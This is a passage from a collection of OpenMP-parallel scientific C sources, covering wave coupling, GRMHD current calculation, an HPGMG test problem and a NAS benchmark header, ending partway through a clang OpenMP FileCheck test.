sum_euclid += euclid_dist_2(feature[i],
cluster_centres[nearest_cluster_index],
nfeatures);
}
/* divide by n, then take sqrt */
ret = sqrt(sum_euclid / npoints);
return(ret);
}
|
couple_waves.c | /*
* couple_waves.c
*
* Couple 3 waves contained in C99 complex arrays.
*
*/
#include <stdio.h>
#ifdef _OPENMP
#include <omp.h>
#endif
#include "mytypes.h"
#include "light.h"
#include "pf3dbench.h"
#include "util.h"
#include "runparm.h"
#include "pf3dbenchvars.h"
void couple_z(rcomplex * restrict t0, rcomplex * restrict t2,
rcomplex * restrict denp)
{
real c20, cslamt, snlamt, r_zlam, r, fratio;
real r_fratio, cratio, zac2;
double zlam, c2re, c2im;
rcomplex a0t, a2t, c2, z3;
int ix, iy, iz;
long it0;
cratio= 1.0e3;
fratio = SQRT(0.9);
r_fratio = ONE/fratio;
c20 = 0.25 * cratio * r_fratio;
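/* Reading of the loop below: per cell, c2 (proportional to the local
   density denp) couples the a0 and a2 amplitudes, lambda = |c2| acts as a
   rotation rate, and the update mixes a0 and a2 through cos/sin of
   lambda*dt/2, i.e. a rotation-like 2x2 transform. Offered as orientation
   only; the physics is defined by the surrounding pf3d sources. */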
start_omp_time();
#ifdef _OPENMP
/* #pragma omp parallel for simd aligned(t0,t2:64) simdlen(real_lane_count) COLLAPSE(3) private(c2, a0t, a2t, zlam, r_zlam, snlamt, cslamt, r, z3, it0, zac2, c2re, c2im) */
#pragma omp parallel for COLLAPSE(2) private(c2, a0t, a2t, zlam, r_zlam, snlamt, cslamt, r, z3, it0, zac2, c2re, c2im)
#endif
for (iz=0; iz<nzl; iz++) {
for (iy=0; iy<nyl; iy++) {
#ifdef _OPENMP
#pragma omp simd aligned(t0,t2:64) simdlen(real_lane_count)
#endif
for (ix=0; ix<nxl; ix++) {
it0= CELTNDX(ix,iy,iz);
c2 = c20 * denp[it0];
c2re = CREAL(c2); c2im = CIMAG(c2);
/* compute lambda = sqrt(|c2|^2) using doubles
   to avoid underflow. */
zlam = c2re*c2re + c2im*c2im + 1.0e-34;
zlam = sqrt(zlam);
snlamt = SIN(zlam * dt * HALF);
cslamt = COS(zlam * dt * HALF);
a0t = t0[it0];
a2t = t2[it0] * fratio;
/* normalize c2 */
r_zlam= ONE/(real)zlam;
c2 *= r_zlam;
/* compute the square of c2 after scaling */
zac2 = zabs2(c2);
/* compute new A0 */
z3 = c2 * a2t * snlamt ;
t0[it0] = a0t * cslamt - IREAL * z3;
/* compute new A2 */
r = zac2 * cslamt;
z3 = CONJ(c2) * a0t * snlamt;
t2[it0] = ( a2t * r - IREAL * z3 ) * r_fratio;
} /* end for-loop */
} /* end for-loop */
}
stop_omp_time();
}
|
current.c | /*---------------------------------------------------------------------------------
CURRENT.C
-Calculate current from fluid variables
-----------------------------------------------------------------------------------*/
#include "decs.h"
double gFcon_calc(struct GridGeom *G, struct FluidState *S, int mu, int nu, int i, int j);
int antisym(int a, int b, int c, int d);
int pp(int n, int *P);
static struct FluidState *Sa;
// Calculate the current
void current_calc(struct GridGeom *G, struct FluidState *S, struct FluidState *Ssave, double dtsave)
{
timer_start(TIMER_CURRENT);
static int first_run = 1;
if (first_run)
{
//We only need the primitives, but this is fast
Sa = calloc(1,sizeof(struct FluidState));
first_run = 0;
}
// Calculate time-centered P
// Intel 18.0.2 crashes at these parallel directives
#if !INTEL_WORKAROUND
#pragma omp parallel for simd collapse(2)
#endif
PLOOP
{
ZLOOPALL
{
Sa->P[ip][j][i] = 0.5*(S->P[ip][j][i] + Ssave->P[ip][j][i]);
}
}
// Keep all get_state calls outside the loop so it doesn't modify S{a,save}
get_state_vec(G, S, CENT, -1, N2, -1, N1);
get_state_vec(G, Ssave, CENT, -1, N2, -1, N1);
get_state_vec(G, Sa, CENT, -1, N2, -1, N1);
#if !INTEL_WORKAROUND
#pragma omp parallel for simd collapse(2)
#endif
DLOOP1 ZLOOPALL S->jcon[mu][j][i] = 0.;
// Calculate j^{\mu} using centered differences for active zones
#pragma omp parallel for collapse(2)
ZLOOP
{
double gF0p[NDIM], gF0m[NDIM], gF1p[NDIM], gF1m[NDIM], gF2p[NDIM], gF2m[NDIM];
// Get sqrt{-g}*F^{mu nu} at neighboring points
// X0
DLOOP1
{
gF0p[mu] = gFcon_calc(G, S, 0, mu, i, j);
gF0m[mu] = gFcon_calc(G, Ssave, 0, mu, i, j);
}
// X1
DLOOP1
{
gF1p[mu] = gFcon_calc(G, Sa, 1, mu, i+1, j);
gF1m[mu] = gFcon_calc(G, Sa, 1, mu, i-1, j);
}
// X2
DLOOP1
{
gF2p[mu] = gFcon_calc(G, Sa, 2, mu, i, j+1);
gF2m[mu] = gFcon_calc(G, Sa, 2, mu, i, j-1);
}
// Difference: D_mu f^{mu nu} = 4 \pi j^nu
DLOOP1
{
// extra factor of sqrt(4*pi)*j given harm's b_unit
S->jcon[mu][j][i] = (1./(sqrt(4.*M_PI)*G->gdet[CENT][j][i]))*(
(gF0p[mu] - gF0m[mu])/dtsave +
(gF1p[mu] - gF1m[mu])/(2.*dx[1]) +
(gF2p[mu] - gF2m[mu])/(2.*dx[2]));
}
}
timer_stop(TIMER_CURRENT);
}
// Return mu, nu component of contravariant Maxwell tensor at grid zone i, j multiplied by gdet
inline double gFcon_calc(struct GridGeom *G, struct FluidState *S, int mu, int nu, int i, int j)
{
double Fcon;
if (mu == nu) return 0.;
Fcon = 0.;
for (int kap = 0; kap < NDIM; kap++)
{
for (int lam = 0; lam < NDIM; lam++)
{
Fcon += (-1./G->gdet[CENT][j][i])*antisym(mu,nu,kap,lam)*S->ucov[kap][j][i]*S->bcov[lam][j][i];
}
}
return Fcon*G->gdet[CENT][j][i];
}
// Completely antisymmetric 4D symbol
inline int antisym(int a, int b, int c, int d)
{
// Check for valid permutation
if (a < 0 || a > 3) return 100;
if (b < 0 || b > 3) return 100;
if (c < 0 || c > 3) return 100;
if (d < 0 || d > 3) return 100;
// Entries different?
if (a == b) return 0;
if (a == c) return 0;
if (a == d) return 0;
if (b == c) return 0;
if (b == d) return 0;
if (c == d) return 0;
// Determine parity of permutation
int p[4] = {a, b, c, d};
return pp(4, p);
}
// Due to Norm Hardy; good for general n
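// e.g. pp(4, (int[]){0, 1, 2, 3}) returns +1 (identity, even permutation) and
// pp(4, (int[]){1, 0, 2, 3}) returns -1 (a single transposition, odd)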
inline int pp(int n, int P[n])
{
int x;
int p = 0;
int v[n];
for (int j = 0; j < n; j++) v[j] = 0;
for (int j = 0; j < n; j++) {
if (v[j]) p++;
else
{
x = j;
do
{
x = P[x];
v[x] = 1;
} while (x != j);
}
}
if (p % 2 == 0) return 1;
else return -1;
}
|
problem.p4.c | //------------------------------------------------------------------------------------------------------------------------------
// Samuel Williams
// SWWilliams@lbl.gov
// Lawrence Berkeley National Lab
//------------------------------------------------------------------------------------------------------------------------------
void evaluateBeta(double x, double y, double z, double *B, double *Bx, double *By, double *Bz){
double Bmin = 1.0;
double Bmax = 10.0;
double c2 = (Bmax-Bmin)/2; // coefficients to affect this transition
double c1 = (Bmax+Bmin)/2;
double c3 = 10.0; // how sharply (B)eta transitions
double xcenter = 0.50;
double ycenter = 0.50;
double zcenter = 0.50;
// calculate distance from center of the domain (0.5,0.5,0.5)
double r2 = pow((x-xcenter),2) + pow((y-ycenter),2) + pow((z-zcenter),2);
double r2x = 2.0*(x-xcenter);
double r2y = 2.0*(y-ycenter);
double r2z = 2.0*(z-zcenter);
//double r2xx = 2.0;
//double r2yy = 2.0;
//double r2zz = 2.0;
double r = pow(r2,0.5);
double rx = 0.5*r2x*pow(r2,-0.5);
double ry = 0.5*r2y*pow(r2,-0.5);
double rz = 0.5*r2z*pow(r2,-0.5);
//double rxx = 0.5*r2xx*pow(r2,-0.5) - 0.25*r2x*r2x*pow(r2,-1.5);
//double ryy = 0.5*r2yy*pow(r2,-0.5) - 0.25*r2y*r2y*pow(r2,-1.5);
//double rzz = 0.5*r2zz*pow(r2,-0.5) - 0.25*r2z*r2z*pow(r2,-1.5);
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
*B = c1+c2*tanh( c3*(r-0.25) );
*Bx = c2*c3*rx*(1-pow(tanh( c3*(r-0.25) ),2));
*By = c2*c3*ry*(1-pow(tanh( c3*(r-0.25) ),2));
*Bz = c2*c3*rz*(1-pow(tanh( c3*(r-0.25) ),2));
}
//------------------------------------------------------------------------------------------------------------------------------
void evaluateU(double x, double y, double z, double *U, double *Ux, double *Uy, double *Uz, double *Uxx, double *Uyy, double *Uzz, int isPeriodic){
// should be continuous in u, u', and u''
// v(w) = w^4 - 2w^3 + w^2 + c
// u(x,y,z) = v(x)v(y)v(z)
// If Periodic, then the integral of the RHS should sum to zero.
// Setting shift = -1/30 ensures that the integrals of X, Y, and Z over [0,1] are zero...
// That should(?) make the integrals of u,ux,uy,uz,uxx,uyy,uzz sum to zero and thus make the integral of f sum to zero
// If dirichlet, then w(0)=w(1) = 0.0
// Setting shift to 0 should ensure that U(x,y,z) = 0 on boundary
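// Check: the integral over [0,1] of w^4 - 2w^3 + w^2 is 1/5 - 1/2 + 1/3 = 1/30,
// so shift = -1/30 makes each of X, Y, Z integrate to zero on the unit interval.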
double shift = 0.0; if (isPeriodic) shift = -1.0/30.0;
double X = 1.0*pow(x,4) - 2.0*pow(x,3) + 1.0*pow(x,2) + shift;
double Y = 1.0*pow(y,4) - 2.0*pow(y,3) + 1.0*pow(y,2) + shift;
double Z = 1.0*pow(z,4) - 2.0*pow(z,3) + 1.0*pow(z,2) + shift;
double Xx = 4.0*pow(x,3) - 6.0*pow(x,2) + 2.0*x;
double Yy = 4.0*pow(y,3) - 6.0*pow(y,2) + 2.0*y;
double Zz = 4.0*pow(z,3) - 6.0*pow(z,2) + 2.0*z;
double Xxx = 12.0*pow(x,2) - 12.0*x + 2.0;
double Yyy = 12.0*pow(y,2) - 12.0*y + 2.0;
double Zzz = 12.0*pow(z,2) - 12.0*z + 2.0;
*U = X*Y*Z;
*Ux = Xx*Y*Z;
*Uy = X*Yy*Z;
*Uz = X*Y*Zz;
*Uxx = Xxx*Y*Z;
*Uyy = X*Yyy*Z;
*Uzz = X*Y*Zzz;
}
//------------------------------------------------------------------------------------------------------------------------------
void initialize_problem(level_type * level, double hLevel, double a, double b){
level->h = hLevel;
int box;
for(box=0;box<level->num_my_boxes;box++){
int i,j,k;
const int jStride = level->my_boxes[box].jStride;
const int kStride = level->my_boxes[box].kStride;
const int ghosts = level->my_boxes[box].ghosts;
const int dim_i = level->my_boxes[box].dim;
const int dim_j = level->my_boxes[box].dim;
const int dim_k = level->my_boxes[box].dim;
#ifdef _OPENMP
#pragma omp parallel for private(k,j,i) collapse(3)
#endif
for(k=0;k<=dim_k;k++){ // include high face
for(j=0;j<=dim_j;j++){ // include high face
for(i=0;i<=dim_i;i++){ // include high face
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
int ijk = (i+ghosts) + (j+ghosts)*jStride + (k+ghosts)*kStride;
double x = hLevel*( (double)(i+level->my_boxes[box].low.i) + 0.5 ); // +0.5 to get to the center of cell
double y = hLevel*( (double)(j+level->my_boxes[box].low.j) + 0.5 );
double z = hLevel*( (double)(k+level->my_boxes[box].low.k) + 0.5 );
double A,B,Bx,By,Bz,Bi,Bj,Bk;
double U,Ux,Uy,Uz,Uxx,Uyy,Uzz;
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
A = 1.0;
B = 1.0;
Bx = 0.0;
By = 0.0;
Bz = 0.0;
Bi = 1.0;
Bj = 1.0;
Bk = 1.0;
#ifdef STENCIL_VARIABLE_COEFFICIENT // variable coefficient problem...
evaluateBeta(x-hLevel*0.5,y ,z ,&Bi,&Bx,&By,&Bz); // face-centered value of Beta for beta_i
evaluateBeta(x ,y-hLevel*0.5,z ,&Bj,&Bx,&By,&Bz); // face-centered value of Beta for beta_j
evaluateBeta(x ,y ,z-hLevel*0.5,&Bk,&Bx,&By,&Bz); // face-centered value of Beta for beta_k
evaluateBeta(x ,y ,z ,&B ,&Bx,&By,&Bz); // cell-centered value of Beta
#endif
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
evaluateU(x,y,z,&U,&Ux,&Uy,&Uz,&Uxx,&Uyy,&Uzz, (level->boundary_condition.type == BC_PERIODIC) );
double F = a*A*U - b*( (Bx*Ux + By*Uy + Bz*Uz) + B*(Uxx + Uyy + Uzz) );
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
level->my_boxes[box].vectors[VECTOR_BETA_I][ijk] = Bi;
level->my_boxes[box].vectors[VECTOR_BETA_J][ijk] = Bj;
level->my_boxes[box].vectors[VECTOR_BETA_K][ijk] = Bk;
level->my_boxes[box].vectors[VECTOR_ALPHA ][ijk] = A;
//level->my_boxes[box].vectors[VECTOR_UTRUE ][ijk] = U; // obviated by Richardson analysis
level->my_boxes[box].vectors[VECTOR_F ][ijk] = F;
//- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
}}}
}
}
//------------------------------------------------------------------------------------------------------------------------------
|
header.h | /*--------------------------------------------------------------------
c---------------------------------------------------------------------
c
c header.h
c
c---------------------------------------------------------------------
c-------------------------------------------------------------------*/
/*--------------------------------------------------------------------
c The following include file is generated automatically by the
c "setparams" utility. It defines
c maxcells: the square root of the maximum number of processors
c problem_size: 12, 64, 102, 162 (for class T, A, B, C)
c dt_default: default time step for this problem size if no
c config file
c niter_default: default number of iterations for this problem size
--------------------------------------------------------------------*/
#ifndef _HEADER_H_
#define _HEADER_H_
#include "npbparams.h"
#include "../math/nas_math.h"
#define AA 0
#define BB 1
#define CC 2
#define BLOCK_SIZE 5
/* COMMON block: global */
static int grid_points[3]; /* grid_points(1:3) */
/* COMMON block: constants */
static double tx1, tx2, tx3, ty1, ty2, ty3, tz1, tz2, tz3;
static double dx1, dx2, dx3, dx4, dx5;
static double dy1, dy2, dy3, dy4, dy5;
static double dz1, dz2, dz3, dz4, dz5;
static double dssp, dt;
static double ce[5][13]; /* ce(5,13) */
static double dxmax, dymax, dzmax;
static double xxcon1, xxcon2, xxcon3, xxcon4, xxcon5;
static double dx1tx1, dx2tx1, dx3tx1, dx4tx1, dx5tx1;
static double yycon1, yycon2, yycon3, yycon4, yycon5;
static double dy1ty1, dy2ty1, dy3ty1, dy4ty1, dy5ty1;
static double zzcon1, zzcon2, zzcon3, zzcon4, zzcon5;
static double dz1tz1, dz2tz1, dz3tz1, dz4tz1, dz5tz1;
static double dnxm1, dnym1, dnzm1, c1c2, c1c5, c3c4, c1345;
static double conz1, c1, c2, c3, c4, c5, c4dssp, c5dssp, dtdssp;
static double dttx1, dttx2, dtty1, dtty2, dttz1, dttz2;
static double c2dttx1, c2dtty1, c2dttz1, comz1, comz4, comz5, comz6;
static double c3c4tx3, c3c4ty3, c3c4tz3, c2iv, con43, con16;
#define IMAX PROBLEM_SIZE
#define JMAX PROBLEM_SIZE
#define KMAX PROBLEM_SIZE
/*
c to improve cache performance, grid dimensions padded by 1
c for even number sizes only.
*/
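/* e.g. IMAX/2*2+1 relies on truncating integer division: it evaluates to
   IMAX+1 when IMAX is even (adding the pad) and to IMAX when IMAX is odd. */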
/* COMMON block: fields */
static double *us_ptr;
static double *vs_ptr;
static double *ws_ptr;
static double *qs_ptr;
static double *rho_i_ptr;
static double *square_ptr;
static double *forcing_ptr;
static double *u_ptr;
static double *rhs_ptr;
static double *lhs_ptr;
static double *fjac_ptr;
static double *njac_ptr;
typedef double s_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
typedef double f_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5+1];
typedef double u_matrix_t[(IMAX+1)/2*2+1][(JMAX+1)/2*2+1][(KMAX+1)/2*2+1][5];
typedef double rhs_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5];
typedef double lhs_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][3][5][5];
typedef double jac_matrix_t[IMAX/2*2+1][JMAX/2*2+1][KMAX-1+1][5][5];
#define ACAST(T, ptr) (*(T*)ptr)
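/* ACAST reinterprets a flat heap allocation as a fixed-dimension array type:
   e.g. "us" expands to (*(s_matrix_t*)us_ptr), which can then be indexed as
   us[i][j][k] just like the original static arrays. */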
#define us ACAST(s_matrix_t, us_ptr)
#define vs ACAST(s_matrix_t, vs_ptr)
#define ws ACAST(s_matrix_t, ws_ptr)
#define qs ACAST(s_matrix_t, qs_ptr)
#define rho_i ACAST(s_matrix_t, rho_i_ptr)
#define square ACAST(s_matrix_t, square_ptr)
#define forcing ACAST(f_matrix_t, forcing_ptr)
#define u ACAST(u_matrix_t, u_ptr)
#define rhs ACAST(rhs_matrix_t, rhs_ptr)
#define lhs ACAST(lhs_matrix_t, lhs_ptr)
#define fjac ACAST(jac_matrix_t, fjac_ptr)
#define njac ACAST(jac_matrix_t, njac_ptr)
// static double us[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double vs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double ws[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double qs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double rho_i[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double square[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1];
// static double forcing[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5+1];
// static double u[(IMAX+1)/2*2+1][(JMAX+1)/2*2+1][(KMAX+1)/2*2+1][5];
// static double rhs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][5];
// static double lhs[IMAX/2*2+1][JMAX/2*2+1][KMAX/2*2+1][3][5][5];
/* COMMON block: work_1d */
double cuf[PROBLEM_SIZE];
double q[PROBLEM_SIZE];
double ue[PROBLEM_SIZE][5];
double buf[PROBLEM_SIZE][5];
#pragma omp threadprivate(cuf, q, ue, buf)
/*
c to improve cache performance, grid dimensions (first two for these
c two arrays) padded by 1 for even number sizes only.
*/
/* COMMON block: work_lhs */
// static double fjac[IMAX/2*2+1][JMAX/2*2+1][KMAX-1+1][5][5];
// /* fjac(5, 5, 0:IMAX/2*2, 0:JMAX/2*2, 0:KMAX-1) */
// static double njac[IMAX/2*2+1][JMAX/2*2+1][KMAX-1+1][5][5];
/* njac(5, 5, 0:IMAX/2*2, 0:JMAX/2*2, 0:KMAX-1) */
static double tmp1, tmp2, tmp3;
#endif
|
irbuilder_for_unsigned_static_chunked.c | // NOTE: Assertions have been autogenerated by utils/update_cc_test_checks.py UTC_ARGS: --function-signature --include-generated-funcs
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp-enable-irbuilder -verify -fopenmp -fopenmp-version=45 -x c++ -triple x86_64-unknown-unknown -emit-llvm %s -o - | FileCheck %s
// expected-no-diagnostics
#ifndef HEADER
#define HEADER
// CHECK-LABEL: define {{.*}}@workshareloop_unsigned_static_chunked(
// CHECK-NEXT: [[ENTRY:.*]]:
// CHECK-NEXT: %[[A_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[B_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[C_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[D_ADDR:.+]] = alloca float*, align 8
// CHECK-NEXT: %[[I:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[AGG_CAPTURED:.+]] = alloca %struct.anon, align 8
// CHECK-NEXT: %[[AGG_CAPTURED1:.+]] = alloca %struct.anon.0, align 4
// CHECK-NEXT: %[[DOTCOUNT_ADDR:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_LASTITER:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_LOWERBOUND:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_UPPERBOUND:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[P_STRIDE:.+]] = alloca i32, align 4
// CHECK-NEXT: store float* %[[A:.+]], float** %[[A_ADDR]], align 8
// CHECK-NEXT: store float* %[[B:.+]], float** %[[B_ADDR]], align 8
// CHECK-NEXT: store float* %[[C:.+]], float** %[[C_ADDR]], align 8
// CHECK-NEXT: store float* %[[D:.+]], float** %[[D_ADDR]], align 8
// CHECK-NEXT: store i32 33, i32* %[[I]], align 4
// CHECK-NEXT: %[[TMP0:.+]] = getelementptr inbounds %struct.anon, %struct.anon* %[[AGG_CAPTURED]], i32 0, i32 0
// CHECK-NEXT: store i32* %[[I]], i32** %[[TMP0]], align 8
// CHECK-NEXT: %[[TMP1:.+]] = getelementptr inbounds %struct.anon.0, %struct.anon.0* %[[AGG_CAPTURED1]], i32 0, i32 0
// CHECK-NEXT: %[[TMP2:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: store i32 %[[TMP2]], i32* %[[TMP1]], align 4
// CHECK-NEXT: call void @__captured_stmt(i32* %[[DOTCOUNT_ADDR]], %struct.anon* %[[AGG_CAPTURED]])
// CHECK-NEXT: %[[DOTCOUNT:.+]] = load i32, i32* %[[DOTCOUNT_ADDR]], align 4
// CHECK-NEXT: br label %[[OMP_LOOP_PREHEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_PREHEADER]]:
// CHECK-NEXT: store i32 0, i32* %[[P_LOWERBOUND]], align 4
// CHECK-NEXT: %[[TMP3:.+]] = sub i32 %[[DOTCOUNT]], 1
// CHECK-NEXT: store i32 %[[TMP3]], i32* %[[P_UPPERBOUND]], align 4
// CHECK-NEXT: store i32 1, i32* %[[P_STRIDE]], align 4
// CHECK-NEXT: %[[OMP_GLOBAL_THREAD_NUM:.+]] = call i32 @__kmpc_global_thread_num(%struct.ident_t* @1)
// CHECK-NEXT: call void @__kmpc_for_static_init_4u(%struct.ident_t* @1, i32 %[[OMP_GLOBAL_THREAD_NUM]], i32 33, i32* %[[P_LASTITER]], i32* %[[P_LOWERBOUND]], i32* %[[P_UPPERBOUND]], i32* %[[P_STRIDE]], i32 1, i32 5)
// CHECK-NEXT: %[[OMP_FIRSTCHUNK_LB:.+]] = load i32, i32* %[[P_LOWERBOUND]], align 4
// CHECK-NEXT: %[[OMP_FIRSTCHUNK_UB:.+]] = load i32, i32* %[[P_UPPERBOUND]], align 4
// CHECK-NEXT: %[[TMP4:.+]] = add i32 %[[OMP_FIRSTCHUNK_UB]], 1
// CHECK-NEXT: %[[OMP_CHUNK_RANGE:.+]] = sub i32 %[[TMP4]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: %[[OMP_DISPATCH_STRIDE:.+]] = load i32, i32* %[[P_STRIDE]], align 4
// CHECK-NEXT: %[[TMP5:.+]] = sub nuw i32 %[[DOTCOUNT]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: %[[TMP6:.+]] = icmp ule i32 %[[DOTCOUNT]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: %[[TMP7:.+]] = sub i32 %[[TMP5]], 1
// CHECK-NEXT: %[[TMP8:.+]] = udiv i32 %[[TMP7]], %[[OMP_DISPATCH_STRIDE]]
// CHECK-NEXT: %[[TMP9:.+]] = add i32 %[[TMP8]], 1
// CHECK-NEXT: %[[TMP10:.+]] = icmp ule i32 %[[TMP5]], %[[OMP_DISPATCH_STRIDE]]
// CHECK-NEXT: %[[TMP11:.+]] = select i1 %[[TMP10]], i32 1, i32 %[[TMP9]]
// CHECK-NEXT: %[[OMP_DISPATCH_TRIPCOUNT:.+]] = select i1 %[[TMP6]], i32 0, i32 %[[TMP11]]
// CHECK-NEXT: br label %[[OMP_DISPATCH_PREHEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_PREHEADER]]:
// CHECK-NEXT: br label %[[OMP_DISPATCH_HEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_HEADER]]:
// CHECK-NEXT: %[[OMP_DISPATCH_IV:.+]] = phi i32 [ 0, %[[OMP_DISPATCH_PREHEADER]] ], [ %[[OMP_DISPATCH_NEXT:.+]], %[[OMP_DISPATCH_INC:.+]] ]
// CHECK-NEXT: br label %[[OMP_DISPATCH_COND:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_COND]]:
// CHECK-NEXT: %[[OMP_DISPATCH_CMP:.+]] = icmp ult i32 %[[OMP_DISPATCH_IV]], %[[OMP_DISPATCH_TRIPCOUNT]]
// CHECK-NEXT: br i1 %[[OMP_DISPATCH_CMP]], label %[[OMP_DISPATCH_BODY:.+]], label %[[OMP_DISPATCH_EXIT:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_BODY]]:
// CHECK-NEXT: %[[TMP12:.+]] = mul i32 %[[OMP_DISPATCH_IV]], %[[OMP_DISPATCH_STRIDE]]
// CHECK-NEXT: %[[TMP13:.+]] = add i32 %[[TMP12]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: br label %[[OMP_LOOP_PREHEADER9:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_INC]]:
// CHECK-NEXT: %[[OMP_DISPATCH_NEXT]] = add nuw i32 %[[OMP_DISPATCH_IV]], 1
// CHECK-NEXT: br label %[[OMP_DISPATCH_HEADER]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_EXIT]]:
// CHECK-NEXT: call void @__kmpc_for_static_fini(%struct.ident_t* @1, i32 %[[OMP_GLOBAL_THREAD_NUM]])
// CHECK-NEXT: %[[OMP_GLOBAL_THREAD_NUM10:.+]] = call i32 @__kmpc_global_thread_num(%struct.ident_t* @1)
// CHECK-NEXT: call void @__kmpc_barrier(%struct.ident_t* @2, i32 %[[OMP_GLOBAL_THREAD_NUM10]])
// CHECK-NEXT: br label %[[OMP_DISPATCH_AFTER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_AFTER]]:
// CHECK-NEXT: br label %[[OMP_LOOP_AFTER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_PREHEADER9]]:
// CHECK-NEXT: %[[TMP14:.+]] = add i32 %[[TMP13]], %[[OMP_CHUNK_RANGE]]
// CHECK-NEXT: %[[OMP_CHUNK_IS_LAST:.+]] = icmp uge i32 %[[TMP14]], %[[DOTCOUNT]]
// CHECK-NEXT: %[[TMP15:.+]] = sub i32 %[[DOTCOUNT]], %[[TMP13]]
// CHECK-NEXT: %[[OMP_CHUNK_TRIPCOUNT:.+]] = select i1 %[[OMP_CHUNK_IS_LAST]], i32 %[[TMP15]], i32 %[[OMP_CHUNK_RANGE]]
// CHECK-NEXT: br label %[[OMP_LOOP_HEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_HEADER]]:
// CHECK-NEXT: %[[OMP_LOOP_IV:.+]] = phi i32 [ 0, %[[OMP_LOOP_PREHEADER9]] ], [ %[[OMP_LOOP_NEXT:.+]], %[[OMP_LOOP_INC:.+]] ]
// CHECK-NEXT: br label %[[OMP_LOOP_COND:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_COND]]:
// CHECK-NEXT: %[[OMP_LOOP_CMP:.+]] = icmp ult i32 %[[OMP_LOOP_IV]], %[[OMP_CHUNK_TRIPCOUNT]]
// CHECK-NEXT: br i1 %[[OMP_LOOP_CMP]], label %[[OMP_LOOP_BODY:.+]], label %[[OMP_LOOP_EXIT:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_BODY]]:
// CHECK-NEXT: %[[TMP16:.+]] = add i32 %[[OMP_LOOP_IV]], %[[TMP13]]
// CHECK-NEXT: call void @__captured_stmt.1(i32* %[[I]], i32 %[[TMP16]], %struct.anon.0* %[[AGG_CAPTURED1]])
// CHECK-NEXT: %[[TMP17:.+]] = load float*, float** %[[B_ADDR]], align 8
// CHECK-NEXT: %[[TMP18:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM:.+]] = zext i32 %[[TMP18]] to i64
// CHECK-NEXT: %[[ARRAYIDX:.+]] = getelementptr inbounds float, float* %[[TMP17]], i64 %[[IDXPROM]]
// CHECK-NEXT: %[[TMP19:.+]] = load float, float* %[[ARRAYIDX]], align 4
// CHECK-NEXT: %[[TMP20:.+]] = load float*, float** %[[C_ADDR]], align 8
// CHECK-NEXT: %[[TMP21:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM2:.+]] = zext i32 %[[TMP21]] to i64
// CHECK-NEXT: %[[ARRAYIDX3:.+]] = getelementptr inbounds float, float* %[[TMP20]], i64 %[[IDXPROM2]]
// CHECK-NEXT: %[[TMP22:.+]] = load float, float* %[[ARRAYIDX3]], align 4
// CHECK-NEXT: %[[MUL:.+]] = fmul float %[[TMP19]], %[[TMP22]]
// CHECK-NEXT: %[[TMP23:.+]] = load float*, float** %[[D_ADDR]], align 8
// CHECK-NEXT: %[[TMP24:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM4:.+]] = zext i32 %[[TMP24]] to i64
// CHECK-NEXT: %[[ARRAYIDX5:.+]] = getelementptr inbounds float, float* %[[TMP23]], i64 %[[IDXPROM4]]
// CHECK-NEXT: %[[TMP25:.+]] = load float, float* %[[ARRAYIDX5]], align 4
